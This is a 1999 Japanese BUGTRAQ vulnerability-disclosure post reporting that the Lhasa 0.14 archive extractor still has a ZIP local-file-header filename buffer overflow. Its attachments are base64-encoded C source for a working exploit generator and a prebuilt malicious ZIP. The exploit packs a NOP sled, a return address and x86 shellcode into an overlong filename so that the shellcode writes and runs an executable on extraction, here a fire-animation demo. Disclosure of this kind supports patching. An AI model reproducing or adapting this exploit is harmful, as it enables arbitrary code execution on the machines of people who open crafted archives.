Return-Path: owner-bugtraq-jp@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: multipart/mixed;
              boundary="V2VkLCAxNyBOb3YgMTk5OSAxOTowNDoxMSArMDkwMA=="
Content-Transfer-Encoding: 7bit
X-Mailer: Becky! ver 1.25.05
Message-ID:  <38327D9B280.4E3ESECURITY@210.157.158.132>
Date:         Wed, 17 Nov 1999 19:04:11 +0900
Reply-To: Artemis Security Team <security@ARTEMIS-JP.COM>
Sender: BUGTRAQ-JP List <BUGTRAQ-JP@SECURITYFOCUS.COM>
From: Artemis Security Team <security@ARTEMIS-JP.COM>
Subject:      Lhasa0.14 LFH_filename BUfferOverflow
X-To:         bugtraq-jp <BUGTRAQ-JP@SECURITYFOCUS.COM>
To: BUGTRAQ-JP@SECURITYFOCUS.COM

--V2VkLCAxNyBOb3YgMTk5OSAxOTowNDoxMSArMDkwMA==
Content-Type: text/plain; charset=ISO-2022-JP

Artemis Security Teamです。


　ローカルファイルヘッダのファイル名のバッファオーバーフロー対策を施した
新しいバージョンである「Lhasa 0.14」にも同様のセキュリティホールがある事
が判明しましたので報告します。

　最新版の0.14でどのような対策を講じたのかは分かりませんが、以前ポストし
たExploit code自体を無視するようなパターンではないかと思われます。確かに
以前のコードで作成されたExploitZipアーカイブではオーバーフローは起こりま
せんでしたが、若干改良したものだと同じようにオーバーフローが発生します。
　オーバーフローが起こる原因も修正すべきポイントも防ぐ方法も、前回の0.13
と同様と思われますので省きます。


[検証用Exploitコード]

　添付してあります。これで作成されるzipコードを「Lhasa 0.14」で解凍すると
バッファオーバーフローが発生し任意のコードを実行するということがわかると
思います。このテストプログラムでは、255バイト以下の任意のファイルを作成、
実行するというExploitコードを用いて、フルスクリーンで炎の画像を表示すると
いうデモを実行するものです。終了するにはESCキーを押してください。



------------------------------------------
Artemis Security Team / ARTEMIS co.,ltd.
Website : http://www.artemis-jp.com
E-Mail  : security@artemis-jp.com



--V2VkLCAxNyBOb3YgMTk5OSAxOTowNDoxMSArMDkwMA==
Content-Type: application/octet-stream; name="lhasa014_fire.c"
Content-Disposition: attachment;
 filename="lhasa014_fire.c"
Content-Transfer-Encoding: base64

DQovKi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tKi8NCi8qCUxoYXNhKDAuMTQpIEV4cGxvaXQgICB3cml0dGVuIGJ5IEFydGVtaXMg
U2VjdXJpdHkgVGVhbQkJKi8NCi8qCS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLQkJKi8NCi8qCQkJCQkJCQkJCQkJCQkJCSovDQovKglXZWJTaXRl
IDogaHR0cDovL3d3dy5hcnRlbWlzLWpwLmNvbQkJCQkJCQkqLw0KLyoJRS1NYWlsICA6IHNlY3Vy
aXR5QGFydGVtaXMtanAuY29tCQkJCQkJCSovDQovKi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tKi8NCg0KDQojaW5jbHVkZSA8c3Rk
aW8uaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNs
dWRlIDxzdHJpbmcuaD4NCg0KDQojZGVmaW5lCUVYX1pJUF9GSUxFTkFNRQkJIi4vbGhhc2EwMTQu
emlwIg0KDQojZGVmaW5lCUxGSF9GSUxFTkFNRV9TSVpFCSggMTIwMCApDQojZGVmaW5lCUxGSF9F
WFRSQV9TSVpFCQkoIDExICkNCg0KI2RlZmluZQlMRkhfR1NfT0ZGU0VUCQkoIDQyNCApDQojZGVm
aW5lCUxGSF9HUkZfT0ZGU0VUCQkoIDYyOCApDQojZGVmaW5lCUxGSF9YQ09ERV9PRkZTRVQJKCA2
MzIgKQ0KI2RlZmluZQlMRkhfR1JGX0FERFIJCSggMHgwMDQzMDMxMiApDQoNCg0KY2hhcglsb2Nh
bF9maWxlX2hlYWRlclsgMzAgXQk9IHsgMHg1MCwgMHg0QiwgMHgwMywgMHgwNCwgMHgxNCwgMHgw
MCwgMHgwMCwgMHgwMCwgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAweDA4
LCAweDAwLCAweDUzLCAweEJBLCAweDNBLCAweDI3LCAweEJDLCAweDRCLCANCiAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgIDB4RkMsIDB4QjEsIDB4MEYsIDB4MDAsIDB4MDAsIDB4
MDAsIDB4NjQsIDB4MDAsIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgMHgw
MCwgMHgwMCwgMHg0QywgMHgwNCwgMHgxMSwgMHgwMCB9Ow0KDQpjaGFyCWxmaF9maWxlbmFtZVsg
TEZIX0ZJTEVOQU1FX1NJWkUgXTsNCg0KY2hhcglsb2NhbF9leHRyYV9maWVsZFsgMTMgXQk9IHsg
MHg1NSwgMHg1NCwgMHgwRCwgMHgwMCwgMHgwNywgMHgzRSwgMHgyQiwgMHhFRSwgDQogICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAweDM3LCAweDcwLCAweEUzLCAweEVDLCAweDM3
IH07DQoNCmNoYXIJZnVja19maWxlZGF0YVsgMTkgXQkJPSB7IDB4M0QsIDB4MkIsIDB4RUUsIDB4
MzcsIDB4MzMsIDB4MzAsIDB4MzQsIDB4MzIsIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgMHgzNiwgMHgzMSwgMHgzNSwgMHgzMywgMHhCNywgMHhCMCwgMHgzNCwgMHhBMCwg
DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAweDE5LCAweDBCLCAweDAwIH07
DQoNCmNoYXIJY2VudHJhbF9kaXJzWyA4NSBdCQk9IHsgMHg1MCwgMHg0QiwgMHgwMSwgMHgwMiwg
MHgxNiwgMHgwQiwgMHgxNCwgMHgwMCwgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAweDAwLCAweDAwLCAweDA4LCAweDAwLCAweDUzLCAweEJBLCAweDNBLCAweDI3LCANCiAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDB4QkMsIDB4NEIsIDB4RkMsIDB4QjEs
IDB4MEYsIDB4MDAsIDB4MDAsIDB4MDAsIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgMHg2NCwgMHgwMCwgMHgwMCwgMHgwMCwgMHgwOCwgMHgwMCwgMHgwOSwgMHgwMCwgDQog
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAweDAwLCAweDAwLCAweDAwLCAweDAw
LCAweDAxLCAweDAwLCAweDIwLCAweDAwLCANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgIDB4QjYsIDB4ODEsIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4NjYsIDB4NzUsIA0K
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgMHg2MywgMHg2QiwgMHgyRSwgMHg3
NCwgMHg3OCwgMHg3NCwgMHg1NSwgMHg1NCwgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAweDA1LCAweDAwLCAweDA3LCAweDNFLCAweDJCLCAweEVFLCAweDM3LCAweDUwLCAN
CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDB4NEIsIDB4MDUsIDB4MDYsIDB4
MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDEsIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgMHgwMCwgMHgwMSwgMHgwMCwgMHgzRiwgMHgwMCwgMHgwMCwgMHgwMCwgMHg0Niwg
DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAweDAwLCAweDAwLCAweDAwLCAw
eDAwLCAweDAwIH07DQoNCg0KdV9jaGFyCWV4cGxvaXRfY29kZVsgMzAwIF0JCT0gew0KICAgIDB4
RUIsMHg0RiwweDVGLDB4MzIsMHhDMCwweDg4LDB4NDcsMHgwQSwweDg4LDB4NDcsMHgxMCwweDg4
LDB4NDcsMHgxNywweDg4LDB4NDcsDQogICAgMHgxRSwweDg4LDB4NDcsMHgyMywweDg4LDB4NDcs
MHgyNiwweDg4LDB4NDcsMHgyRCwweDg4LDB4NDcsMHgzQywweDU3LDB4QjgsMHg1MCwNCiAgICAw
eDc3LDB4RjcsMHhCRiwweEZGLDB4RDAsMHg4QiwweEYwLDB4MzMsMHhEQiwweEIzLDB4MEIsMHg4
QiwweEM3LDB4MDMsMHhDMywweDUwLA0KICAgIDB4NTYsMHhCOCwweDI4LDB4NkUsMHhGNywweEJG
LDB4RkYsMHhEMCwweDhCLDB4QzgsMHgzMywweERCLDB4QjMsMHgyNCwweDhCLDB4QzcsDQogICAg
MHgwMywweEMzLDB4NTAsMHhCMywweDMyLDB4OEIsMHhDNywweDAzLDB4QzMsMHg1MCwweEZGLDB4
RDEsMHg4OSwweDQ3LDB4MkUsMHhFQiwNCiAgICAweDAyLDB4RUIsMHg3MSwweDMzLDB4REIsMHhC
MywweDE4LDB4OEIsMHhDNywweDAzLDB4QzMsMHg1MCwweDU2LDB4QjgsMHgyOCwweDZFLA0KICAg
IDB4RjcsMHhCRiwweEZGLDB4RDAsMHg4QiwweEM4LDB4OEIsMHg0NywweDJFLDB4NTAsMHgzMyww
eEMwLDB4QjAsMHgwMywweDkwLDB4OTAsDQogICAgMHg1MCwweEIwLDB4MDEsMHg1MCwweDMzLDB4
REIsMHhCMywweDNELDB4MDMsMHhERiwweDUzLDB4RkYsMHhEMSwweDMzLDB4REIsMHhCMywNCiAg
ICAweDExLDB4OEIsMHhDNywweDAzLDB4QzMsMHg1MCwweDU2LDB4QjgsMHgyOCwweDZFLDB4Rjcs
MHhCRiwweEZGLDB4RDAsMHg4QiwweDVGLA0KICAgIDB4MkUsMHg1MywweEZGLDB4RDAsMHgzMyww
eERCLDB4QjMsMHgyNywweDhCLDB4QzcsMHgwMywweEMzLDB4NTAsMHg1NiwweEI4LDB4MjgsDQog
ICAgMHg2RSwweEY3LDB4QkYsMHhGRiwweEQwLDB4MzMsMHhEQiwweEIzLDB4MzIsMHg4QiwweENG
LDB4MDMsMHhDQiwweDUxLDB4RkYsMHhEMCwNCiAgICAweDMzLDB4REIsMHg1MywweEIzLDB4MUYs
MHg4QiwweEM3LDB4MDMsMHhDMywweDUwLDB4NTYsMHhCOCwweDI4LDB4NkUsMHhGNywweEJGLA0K
ICAgIDB4RkYsMHhEMCwweEZGLDB4RDAsMHhFOCwweDM5LDB4RkYsMHhGRiwweEZGLDB4MDANCiAg
ICB9Ow0KDQovKiAgICAgICAgICAgICAgICAgICAgICAgIDAgICAgICAgICAxICAgICAgICAgMiAg
ICAgICAgIDMgICAgICAgICA0ICAgICAgICAgNSAgICAgICAgIDYJKi8NCi8qICAgICAgICAgICAg
ICAgICAgICAgICAgMDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0
NTY3ODkwMTIzNDU2Nzg5MAkqLw0KY2hhciBzdHJpbmdfYnVmZmVyWzEwMDBdPSJtc3ZjcnQuZGxs
X2ZvcGVuX2ZjbG9zZV9md3JpdGVfZXhpdF93Yl9zeXN0ZW1fKioqKiI7DQpjaGFyIGZpbGVuYW1l
WzEwMF09ICAgICAgImM6XFxhYWEuY29tIjsNCg0KDQovKgmOwI1zgrOCuYLpg3aDjYNPg4mDgILM
g1KBW4NogUYJCQkJKi8NCi8qCYKxguqCzYFBd2lsZGZpcmUuY29tgsaCooKkMjU1g2+DQ4NngsyD
ZoOCgUIJKi8NCmNoYXIJZXhwbG9pdF9kYXRhMlsyNTVdCT0geyANCiAgICAweDhjLDB4Y2IsMHgy
ZSwweGExLDB4MDIsMHgwMCwweDI5LDB4ZDgsMHgzZCwweGYxLDB4MWYsMHg3MywweDAyLDB4Y2Qs
MHgyMCwweDgwLA0KICAgIDB4YzcsMHgxMCwweDhlLDB4ZGIsMHhjNywweDA2LDB4MDAsMHhmZiww
eDQ4LDB4NjYsMHg4ZSwweGMzLDB4MzMsMHhjMCwweDMzLDB4ZmYsDQogICAgMHhiOSwweDAwLDB4
N2QsMHhmMywweGFiLDB4YjgsMHgwMCwweGEwLDB4OGUsMHhjMCwweGI4LDB4MTMsMHgwMCwweGNk
LDB4MTAsMHhiYSwNCiAgICAweGM4LDB4MDMsMHhiMCwweDAwLDB4ZWUsMHg0MiwweGIxLDB4MDAs
MHg4OCwweGM4LDB4ZWUsMHhjMCwweGU4LDB4MDIsMHhlZSwweGIwLA0KICAgIDB4MDAsMHhlZSww
eDQxLDB4ODAsMHhmOSwweDQwLDB4NzIsMHhmMCwweGIxLDB4MDAsMHhiMCwweDNmLDB4ZWUsMHg4
OCwweGM4LDB4ZDAsDQogICAgMHhlOCwweDA0LDB4MTAsMHhlZSwweGIwLDB4MDAsMHhlZSwweDQx
LDB4ODAsMHhmOSwweDQwLDB4NzIsMHhlZCwweGIxLDB4MDAsMHhiMCwNCiAgICAweDNmLDB4ZWUs
MHg4OCwweGM4LDB4YzAsMHhlOCwweDAyLDB4MDQsMHgzMCwweGVlLDB4ODgsMHhjOCwweGVlLDB4
NDEsMHg4MCwweGY5LA0KICAgIDB4NDAsMHg3MiwweGVjLDB4YjksMHhjMCwweDAwLDB4YjAsMHgz
ZiwweGVlLDB4ZTIsMHhmZCwweGJmLDB4NDAsMHhmYiwweGExLDB4MDAsDQogICAgMHhmZiwweGQw
LDB4YzAsMHgwMiwweGM0LDB4ZDAsMHhjYywweDJhLDB4ZTAsMHhhMywweDAwLDB4ZmYsMHg4OSww
eDA1LDB4ODksMHg4NSwNCiAgICAweDQwLDB4MDEsMHg4MywweGM3LDB4MDIsMHg4MSwweGZmLDB4
ODAsMHhmYywweDcyLDB4ZTMsMHhlOCwweDJjLDB4MDAsMHhiNCwweDAxLA0KICAgIDB4Y2QsMHgx
NiwweDc0LDB4ZDcsMHhiNCwweDAwLDB4Y2QsMHgxNiwweGIyLDB4NjQsMHg2MCwweGU4LDB4MWMs
MHgwMCwweDYxLDB4MDYsDQogICAgMHg4YywweGQ4LDB4OGUsMHhjMCwweDhhLDB4YzIsMHhiOSww
eDAwLDB4MDUsMHhiZiwweDAwLDB4ZmEsMHhmMywweGFhLDB4MDcsMHhmZSwNCiAgICAweGNhLDB4
NzUsMHhlNywweGI4LDB4MDMsMHgwMCwweGNkLDB4MTAsMHhjZCwweDIwLDB4YmUsMHg4MCwweDAy
LDB4MzMsMHhjMCwweGI3LA0KICAgIDB4MDAsMHgwMiwweDQ0LDB4ZmYsMHgwMiwweDA0LDB4MTAs
MHhmYywweDAyLDB4NDQsMHgwMSwweDEwLDB4ZmMsMHgwMiwweDg0LDB4NDAsDQogICAgMHgwMSww
eDEwLDB4ZmMsMHhjMSwweGU4LDB4MDIsMHg3NCwweDAxLDB4NDgsMHg4OCwweDg0LDB4ODAsMHhm
ZCwweDQ2LDB4ODEsMHhmZSwNCiAgICAweGMwLDB4ZmQsMHg3MiwweGQ5LDB4MzMsMHhmNiwweDMz
LDB4ZmYsMHhiOSwweGUwLDB4M2QsMHg2NiwweGYzLDB4YTUsMHhjMw0KICAgIH07DQoNCg0KDQoN
Cg0KLyoqKioqKioqKioqKi8NCi8qCW1haW4JKi8NCi8qKioqKioqKioqKiovDQppbnQNCm1haW4o
IHZvaWQgKQ0KCXsNCgl1X2NoYXIJcDEsIHAyLCB0bXBfbGVuLCBleHBsb2l0X2NvZGVfbGVuOw0K
CXVfbG9uZwlpcDsNCglpbnQJCWxvb3A7DQoJRklMRQkqZnA7DQoJDQoJDQoJLyoJg42BW4NKg4uD
dINAg0ODi4N3g2KDX4LMg3SDQINDg4uWvJK3grOC8JDdkugJKi8NCglsb2NhbF9maWxlX2hlYWRl
clsgMjYgXSA9ICggTEZIX0ZJTEVOQU1FX1NJWkU+PjAgKSAmIDB4MDAwMDAwZmY7DQoJbG9jYWxf
ZmlsZV9oZWFkZXJbIDI3IF0gPSAoIExGSF9GSUxFTkFNRV9TSVpFPj44ICkgJiAweDAwMDAwMGZm
Ow0KCQ0KCQ0KCS8qCYN0g0CDQ4OLlryKaZRbg2+DYoN0g0CC8DB4OTAoTk9QKYLFloSC34LpCSov
DQoJZm9yKCBsb29wID0gMDsgbG9vcCA8IExGSF9GSUxFTkFNRV9TSVpFOyBsb29wKysgKQ0KCQl7
DQoJCWxmaF9maWxlbmFtZVsgbG9vcCBdID0gMHg5MDsNCgkJfQ0KCQ0KCS8qCYFAgqiCu4Lngq1H
U4LJiWWLv4Lwl16CpoLpg3yDQ4OTg2eBQoKxgrGC8AkqLw0KCS8qCYNbg42CyYK1gsiCooLGTEZI
X0dSRl9PRkZTRVSCqoNZg4yC6YFCCQkqLw0KCWxmaF9maWxlbmFtZVsgTEZIX0dTX09GRlNFVCBd
CQk9IDB4MDA7DQoJDQoJLyoJl+GKT4Nug5ODaIOJg0GDaIOMg1iCzI53kugJKi8NCglpcCA9IExG
SF9HUkZfQUREUjsNCglsZmhfZmlsZW5hbWVbIExGSF9HUkZfT0ZGU0VUICsgMCBdCT0gKCBjaGFy
KSggaXA+PjAgICkgJiAweDAwMDAwMGZmOw0KCWxmaF9maWxlbmFtZVsgTEZIX0dSRl9PRkZTRVQg
KyAxIF0JPSAoIGNoYXIpKCBpcD4+OCAgKSAmIDB4MDAwMDAwZmY7DQoJbGZoX2ZpbGVuYW1lWyBM
RkhfR1JGX09GRlNFVCArIDIgXQk9ICggY2hhcikoIGlwPj4xNiApICYgMHgwMDAwMDBmZjsNCgls
ZmhfZmlsZW5hbWVbIExGSF9HUkZfT0ZGU0VUICsgMyBdCT0gKCBjaGFyKSggaXA+PjI0ICkgJiAw
eDAwMDAwMGZmOw0KCQ0KCQ0KCS8qCUV4cGxvaXSDUoFbg2iCzI1cknoJCSovDQoJcDEJPSBzdHJs
ZW4oIGZpbGVuYW1lICkgKyBzdHJsZW4oIHN0cmluZ19idWZmZXIgKTsNCglwMgk9IDI1NTsNCgkN
CgkvKgmOwI1zg3SDQINDg4uCyTB4MDCCqpP8gumI14LMj4iSdYKiguuCooLrLi4uCSovDQoJdG1w
X2xlbiA9IHN0cmxlbiggc3RyaW5nX2J1ZmZlciApOw0KCWV4cGxvaXRfY29kZV9sZW4gPSBzdHJs
ZW4oIGV4cGxvaXRfY29kZSApOw0KCQ0KCXN0cmNhdCggc3RyaW5nX2J1ZmZlciwgZmlsZW5hbWUg
KTsNCglzdHJjYXQoIHN0cmluZ19idWZmZXIsICJfIiApOw0KCW1lbWNweSggc3RyaW5nX2J1ZmZl
ciArIHN0cmxlbiggc3RyaW5nX2J1ZmZlciApLCBleHBsb2l0X2RhdGEyLCAyNTUgKTsNCgltZW1j
cHkoIGV4cGxvaXRfY29kZSArIHN0cmxlbiggZXhwbG9pdF9jb2RlICksIHN0cmluZ19idWZmZXIs
IA0KCSAgICAgICAgdG1wX2xlbiArIHN0cmxlbiggZmlsZW5hbWUgKSArIDEgKyAyNTUgKTsNCgkN
CglleHBsb2l0X2NvZGVbIDB4MWMgXQk9IHAxOwkJLyoJg3SDQINDg4uWvJW2jpqX8Y9Jl7mDSYN0
g1qDYoNnCSovDQoJZXhwbG9pdF9jb2RlWyAweDZkIF0JPSBwMjsJCS8qCYNmgVuDXpK3CQkJCQkJ
Ki8NCglleHBsb2l0X2NvZGVbIDB4NzcgXQk9IHAxICsgMTsJLyoJg2aBW4Neg2+DYoN0g0CDfIND
g5ODXgkJCSovDQoJDQoJLyoJgrGCsYLFRXhwbG9pdINSgVuDaILwityC8YK+g3SDQINDg4uWvIKq
j2+XiIKggqqC6QkqLw0KCW1lbWNweSggbGZoX2ZpbGVuYW1lICsgTEZIX1hDT0RFX09GRlNFVCwg
ZXhwbG9pdF9jb2RlLCANCgkgICAgICAgIHRtcF9sZW4gKyBzdHJsZW4oIGZpbGVuYW1lICkgKyAx
ICsgMjU1ICsgZXhwbG9pdF9jb2RlX2xlbiApOw0KCQ0KCQ0KCS8qCUxoYXNhX0V4cGxvaXSCyHpp
cINBgVuDSoNDg3WCzI3skKwJKi8NCglpZiggKCBmcCA9IGZvcGVuKCBFWF9aSVBfRklMRU5BTUUs
ICJ3IiApICkgPT0gTlVMTCApDQoJCXsNCgkJcGVycm9yKCAiZm9wZW4iICk7DQoJCWV4aXQoIC0x
ICk7DQoJCX0NCglmd3JpdGUoIGxvY2FsX2ZpbGVfaGVhZGVyLCBzaXplb2YoIGxvY2FsX2ZpbGVf
aGVhZGVyICksIDEsIGZwICk7DQoJZndyaXRlKCBsZmhfZmlsZW5hbWUsIHNpemVvZiggbGZoX2Zp
bGVuYW1lICksIDEsIGZwICk7DQoJZndyaXRlKCBsb2NhbF9leHRyYV9maWVsZCwgc2l6ZW9mKCBs
b2NhbF9leHRyYV9maWVsZCApLCAxLCBmcCApOw0KCWZ3cml0ZSggZnVja19maWxlZGF0YSwgc2l6
ZW9mKCBmdWNrX2ZpbGVkYXRhICksIDEsIGZwICk7DQoJZndyaXRlKCBjZW50cmFsX2RpcnMsIHNp
emVvZiggY2VudHJhbF9kaXJzICksIDEsIGZwICk7DQoJZmNsb3NlKCBmcCApOw0KCQ0KCQ0KCXJl
dHVybiggMCApOw0KCX0NCg0K

--V2VkLCAxNyBOb3YgMTk5OSAxOTowNDoxMSArMDkwMA==
Content-Type: application/x-zip-compressed; name="lhasa014_fire.zip"
Content-Disposition: attachment;
 filename="lhasa014_fire.zip"
Content-Transfer-Encoding: base64

UEsDBBQAAAAIAFO6Oie8S/yxDwAAAGQAAACwBBEAkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkACQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkBIDQwDrT18ywIhHCohHEIhHF4hHHohHI4hH
JohHLYhHPFe4UHf3v//Qi/Az27MLi8cDw1BWuChu97//0IvIM9uzJIvHA8NQszKLxwPDUP/RiUcu
6wLrcTPbsxiLxwPDUFa4KG73v//Qi8iLRy5QM8Cw/5CQULABUDPbsz0D31P/0TPbsxGLxwPDUFa4
KG73v//Qi18uU//QM9uzJ4vHA8NQVrgobve//9Az27Myi88Dy1H/0DPbU7Mfi8cDw1BWuChu97//
0P/Q6Dn///9tc3ZjcnQuZGxsX2ZvcGVuX2ZjbG9zZV9md3JpdGVfZXhpdF93Yl9zeXN0ZW1fKioq
KmM6XGFhYS5jb21fjMsuoQIAKdg98R9zAs0ggMcQjtvHBgD/SGaOwzPAM/+5AH3zq7gAoI7AuBMA
zRC6yAOwAO5CsQCIyO7A6ALusADuQYD5QHLwsQCwP+6IyNDoBBDusADuQYD5QHLtsQCwP+6IyMDo
AgQw7ojI7kGA+UBy7LnAALA/7uL9v0D7oQD/0MACxNDMKuCjAP+JBYmFQAGDxwKB/4D8cuPoLAC0
Ac0WdNe0AM0WsmRg6BwAYQaM2I7AisK5AAW/APrzqgf+ynXnuAMAzRDNIL6AAjPAtwACRP8CBBD8
AkQBEPwChEABEPzB6AJ0AUiIhID9RoH+wP1y2TP2M/+54D1m86XDkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQVVQNAAc+K+43cOPsNz0r7jczMDQyNjE1
M7ewNKAZCwBQSwECFgsUAAAACABTujonvEv8sQ8AAABkAAAACAAJAAAAAAABACAAtoEAAAAAZnVj
ay50eHRVVAUABz4r7jdQSwUGAAAAAAEAAQA/AAAARgAAAAAA

--V2VkLCAxNyBOb3YgMTk5OSAxOTowNDoxMSArMDkwMA==--